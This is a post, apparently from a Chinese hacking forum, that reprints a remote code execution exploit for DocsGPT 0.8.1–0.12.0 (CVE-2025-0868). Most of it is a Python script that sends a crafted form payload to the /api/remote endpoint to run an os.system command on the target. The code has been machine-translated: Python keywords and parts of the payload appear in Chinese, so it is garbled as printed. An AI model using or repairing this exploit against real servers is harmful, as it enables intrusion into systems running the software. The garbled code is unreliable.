H

DOCSGPT 0.12.0-远程代码执行

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: DOCSGPT 0.12.0-远程代码执行
#日期: 09/04/2025
#利用作者: Shreyas Malhotra(OSMSEC)
#供应商homepage: https://github.com/arc53/docsgpt
#软件link: https://github.com/arc53/docsgpt/archive/refs/tags/0.12.0.zip
#版本: 0.8.1至0.12.0
#测试在: Debian Linux/Ubuntu Linux/Kali Linux
#CVE: CVE-2025-0868
导入请求
#目标配置
target='http://10.0.2.15:7091'#更改此
#恶意有效载荷字符串- 小心翼翼- 必要时修改Python代码
malicious_data=(
'user=1source=redditname=elethdata={'source':'reddit','
'''client_id':'1111','client_secret':1111,'user_agent':'111',','
''search_queries': [''],'number_posts':10,'
'''rce \\\\':__Import __(\'os \')。系统(\'touch /tmp /test \')}#':11}'

标题={
'content-type':'应用程序/x-www-form-urlenCoded'
}
TRY:
响应=requests.post(f'{target}/api/remote',标头=标题,data=malicious_data)
print(f'[+]状态码: {response.status_code}')
打印('[+]响应Body:')
打印(响应。文本)
除异常外,E:
打印(f'[ - ]错误发送请求: {e}')
 
后退
顶部